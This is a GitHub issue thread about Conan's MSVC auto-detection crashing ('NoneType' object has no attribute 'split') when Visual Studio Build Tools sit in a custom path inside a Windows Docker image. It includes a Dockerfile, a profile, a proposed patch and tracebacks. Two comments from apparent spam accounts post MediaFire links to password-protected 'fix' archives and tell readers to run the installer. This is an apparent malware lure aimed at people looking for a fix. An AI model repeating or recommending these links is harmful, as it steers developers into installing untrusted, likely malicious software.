### ISSUE TITLE
[bug] Unable to compile when VS is not installed to the correct location

### ISSUE THREAD

**Issue by Todiq** [conan-io/conan#16885]
### Describe the bug

version: 2.6.0
conan_path: C:\venv\Scripts\conan
python
  version: 3.9.13
  sys_version: 3.9.13 (tags/v3.9.13:6de2ca5, May 17 2022, 16:36:42) [MSC v.1929 64 bit (AMD64)]
  sys_executable: C:\venv\Scripts\python.exe
  is_frozen: False
  architecture: AMD64
system
  version: 10.0.20348
  platform: Windows-10-10.0.20348-SP0
  system: Windows
  release: 10
  cpu: Intel64 Family 6 Model 186 Stepping 3, GenuineIntel

### How to reproduce it

Hello,

In CI, for the windows builds (until I stabilise cross building from Linux), I am using a Windows image containing all the tools I need. Here is the Dockerfile:

```dockerfile
# syntax=docker/dockerfile:1.2


ARG BUILD_TOOLS="C:\\BuildTools"
ARG VIRTUAL_ENV="C:\\venv"
ARG GIT="C:\\git"

FROM mcr.microsoft.com/windows/servercore:ltsc2022-KB5040437 as build-tools

SHELL ["powershell.exe", "-ExecutionPolicy", "Bypass", "-Command"]

ARG BUILD_TOOLS
# Build tools LSTC 17.10.5. Taken from https://learn.microsoft.com/en-us/visualstudio/releases/2022/release-history
ARG VS_BUILD_TOOLS="https://download.visualstudio.microsoft.com/download/pr/11917f82-1030-4dda-a768-f0da3c4623a9/9c46bb75e959df411b26cd8bc871a53b495010f4e868fcc509f9bb26756cb311/vs_BuildTools.exe"

RUN "$ProgressPreference = 'SilentlyContinue' ; Invoke-WebRequest -Uri ${env:VS_BUILD_TOOLS} -OutFile vs_BuildTools.exe"

RUN .\vs_BuildTools.exe --quiet --wait --norestart --nocache \
    --installPath "${env:BUILD_TOOLS}" \
    --add Microsoft.VisualStudio.Workload.VCTools \
    --includeRecommended \
    --add Microsoft.VisualStudio.Component.VC.CoreBuildTools \
    --add Microsoft.VisualStudio.Component.VC.Tools.x86.x64 | Out-Null

FROM python:3.9-windowsservercore-ltsc2022 as pip-requirements

ARG VIRTUAL_ENV

ENV LANG=C.UTF-8 \
    PYTHONDONTWRITEBYTECODE=1 \
    PYTHONUNBUFFERED=1

RUN [Environment]::SetEnvironmentVariable('Path', $env:VIRTUAL_ENV + '\Scripts;' + $env:Path, [EnvironmentVariableTarget]::Machine)

COPY "requirements.txt" .

RUN python -m venv "${env:VIRTUAL_ENV}"; \
    python -m pip install --requirement requirements.txt --no-cache-dir

FROM mcr.microsoft.com/windows/servercore:ltsc2022-KB5040437 as git

SHELL ["powershell.exe", "-ExecutionPolicy", "Bypass", "-Command"]

ARG GIT
ARG GIT_VERSION=2.46.0
ARG GIT_URL="https://github.com/git-for-windows/git/releases/download/v${GIT_VERSION}.windows.1/Git-${GIT_VERSION}-64-bit.exe"

RUN "$ProgressPreference = 'SilentlyContinue' ; Invoke-WebRequest -Uri ${env:GIT_URL} -OutFile git.exe"

RUN .\git.exe /SP- /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /DIR="${env:GIT}"

FROM python:3.9-windowsservercore-ltsc2022 as final

ARG BUILD_TOOLS
ARG LLVM
ARG VIRTUAL_ENV
ARG GIT

ENV CONAN_HOME="C:\\conan" \
	CLICOLOR_FORCE=1

COPY --from=pip-requirements "${VIRTUAL_ENV}" "${VIRTUAL_ENV}"

COPY --from=build-tools "${BUILD_TOOLS}" "${BUILD_TOOLS}"

COPY --from=git "${GIT}" "${GIT}"

RUN [Environment]::SetEnvironmentVariable('Path', $env:VIRTUAL_ENV + '\Scripts;' + $env:GIT + '\bin;' + $env:Path, [EnvironmentVariableTarget]::Machine)

WORKDIR "/workspace"

ENTRYPOINT ["C:\\BuildTools\\Common7\\Tools\\VsDevCmd.bat", "&&", "powershell.exe", "-NoLogo", "-ExecutionPolicy", "Bypass"]
```

The `requirements.txt` is this one:
```txt
conan == 2.6.0
cmake == 3.28.3
ninja == 1.11.1.1
numpy == 1.26.4
```

And my profile is that one:
```txt
{% set os = detect_api.detect_os() %}
{% if os == "Windows" %}
	{% set compiler, version, compiler_exe = detect_api.detect_msvc_compiler() %}
{% else %}
	{% set compiler = "msvc" %}
	{% set version = "194" %}
{% endif %}

[settings]
arch={{detect_api.detect_arch()}}
build_type=Release
compiler={{compiler}}
compiler.cppstd=17
compiler.runtime=dynamic
compiler.version={{version}}
os=Windows

[conf]
{% if os == "Windows" %}
	tools.env.virtualenv:powershell=True
{% endif %}
tools.cmake.cmaketoolchain:generator=Ninja Multi-Config
tools.cmake.cmake_layout:build_folder_vars = ["settings.os", "settings.compiler", "settings.compiler.version", "settings.arch"]
```
\
\
\
After building with `docker build -m 32g -t test .`, I am running the container this way: `docker run -it --volume D:\:C:\workspace test`

It successfully loads the VS environment and I can access `cl.exe` (`conan` run as well, for that matter).

However, I am unable to run a `conan install`, which leads to a profile error:

```powershell
PS C:\workspace> conan install -pr:a msvc .\core\
Using lockfile: 'C:\workspace\core\conan.lock'
detect_api: Found msvc 17
ERROR: Error while rendering the profile template file 'C:\conan\profiles\msvc'. Check your Jinja2 syntax: 'NoneType' object has no attribute 'split'
PS C:\workspace>
```
\
\
\
\
We can probably assume that installing `vsBuildTools` in a different layer and copying it to the final one causes the issue. However, it is not fundamentally incorrect, since all the VS tools work.

Is there a way for me to fix the issue within the Dockerfile (setting an env variable for example)?

Or would it be something to update in the code base to better detect and adapt to these specific cases?

Thanks in advance for your time.

**Comment by FabrizioValenti** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by memsharded** [comment]
Hi @Todiq 

Thanks for your report.

If I understood it correctly, this seems an issue in the ``detect_api``, in this call 

```python
compiler, version, compiler_exe = detect_api.detect_msvc_compiler()
```

I am having a look, it seems this woudl be a potential fix in the ``detect_vs.py`` file:
```python
def vs_detect_update(version):
    version = {"194": "17", "193": "17", "192": "16", "191": "15"}.get(str(version))
    full_version = _vs_installation_path(version)[1]
    if not full_version:
        return
    components = full_version.split(".")
    if len(components) > 1:
        return components[1]
```

but even if this error is fixed, the ``detect_api.detect_msvc_compiler()`` will still not be able to find that installation because it is in a custom location?

**Comment by Todiq** [comment]
Hello @memsharded,
\
\
Indeed, in the `final` layer, the install is located in `C:\BuildTools`.
\
\
Would moving that folder to `%ProgramFiles%` be enough? Or is it also because the `C:\Program Files (x86)\Microsoft Visual Studio\Installer` is missing as well?
\
\
Do you think it would be a bad idea to add a variable to the profiles to be able to directly target a custom install folder?

**Comment by memsharded** [comment]
As you are properly provisioning the docker, you fully control the VS being installed and everything, maybe the issue is relying on another layer of auto-detection to gather the same information you are explicitly defining. 

So maybe defining a profile with hardcoded values for the msvc compiler and version is much simpler? The idea of profiles is having as many of them as platforms are supported in the organization products, not having just 1 profile that tries to auto-detect all those different platforms. If we are building 10 different binaries, maybe we should have 10 profiles, or maybe 5 if we are defining ``build_type=Debug/Release`` or something like that dynamically?

Then Conan has some confs like ``tools.microsoft.msbuild:installation_path`` that allows to also define a custom location for MSBuild, so maybe that is a simpler approach?

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Todiq** [comment]
Thanks for the hints!
\
\
If completely missed the `tools.microsoft.msbuild:installation_path`. 
\
\
I try running again the command and added `--conf:all "tools.microsoft.msbuild:installation_path=C:\BuildTools"`, but that still leads to the same issue. 

Looking forward to the fix!

**Comment by Todiq** [comment]
@memsharded,

I just tried running `conan profile detect` on the container startup with conan 2.7.0, but that led to:

```powershell
PS C:\workspace> conan profile detect
detect_api: Found msvc 17
ERROR: Traceback (most recent call last):
  File "C:\venv\lib\site-packages\conan\cli\cli.py", line 294, in main
    cli.run(args)
  File "C:\venv\lib\site-packages\conan\cli\cli.py", line 193, in run
    command.run(self._conan_api, args[0][1:])
  File "C:\venv\lib\site-packages\conan\cli\command.py", line 187, in run
    sub.run(conan_api, parser, *args)
  File "C:\venv\lib\site-packages\conan\cli\command.py", line 205, in run
    info = self._method(conan_api, parent_parser, self._parser, *args)
  File "C:\venv\lib\site-packages\conan\cli\commands\profile.py", line 74, in profile_detect
    detected_profile = conan_api.profiles.detect()
  File "C:\venv\lib\site-packages\conan\api\subapi\profiles.py", line 148, in detect
    settings = detect_defaults_settings()
  File "C:\venv\lib\site-packages\conans\client\conf\detect.py", line 17, in detect_defaults_settings
    compiler, version, compiler_exe = detect_default_compiler()
  File "C:\venv\lib\site-packages\conan\internal\api\detect_api.py", line 388, in detect_default_compiler
    compiler, version, compiler_exe = detect_msvc_compiler()
  File "C:\venv\lib\site-packages\conan\internal\api\detect_api.py", line 535, in detect_msvc_compiler
    update = detect_msvc_update(version)  # FIXME weird passing here the 193 compiler version
  File "C:\venv\lib\site-packages\conan\internal\api\detect_api.py", line 296, in detect_msvc_update
    return vs_detect_update(version)
  File "C:\venv\lib\site-packages\conans\client\conf\detect_vs.py", line 16, in vs_detect_update
    components = full_version.split(".")
AttributeError: 'NoneType' object has no attribute 'split'

ERROR: 'NoneType' object has no attribute 'split'
```

Should we close this ticket to open a new one?
